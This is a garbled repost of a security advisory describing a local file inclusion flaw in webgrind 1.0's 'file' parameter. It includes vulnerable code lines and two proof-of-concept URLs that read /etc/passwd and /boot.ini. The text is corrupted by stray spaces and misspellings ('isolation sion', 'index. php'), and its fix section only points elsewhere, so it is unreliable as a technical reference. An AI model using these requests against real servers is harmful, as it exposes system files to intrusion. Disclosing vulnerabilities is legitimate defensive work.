Title: webgrind 1.0 (file param) Local File isolation sion Vulnerability
By Joakim Nygard and Jacob Oettinger
Developer: http://code.google.com/p/webgrind
Affected Versions: 1.0 (v1.02 in trunk on github)
Abstract:
Webgrind is an Xdebug profiling web frontend in PHP5.
Desc: webgrind suffers from a file inlcusion vulnerability (LFI)
When input passed thru the 'file' parameter to index. php is not
Properly verified before being used to include files. This can be
Exploited to include files from local resources with directory
Traversal attacks and URL encoded NULL bytes.
----------------------------------------
/Index. php:
-----------
122: case 'fileviewer ':
123: $ file = get ('file ');
124: $ line = get ('line ');
----------------------------------------
Test Platform: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
PHP 5.3.9
MySQL 5.5.20
Fault discoverer: Michael Meyer
Michael. meyer greenbone net
---
Http://www.bkjia.com/webgrind/index. php? File =/etc/passwd & op = fileviewer
Http://www.bkjia.com/webgrind/index. php? File =/boot. ini & op = fileviewer
Fix:
Please refer to the previous article on www.2cto.com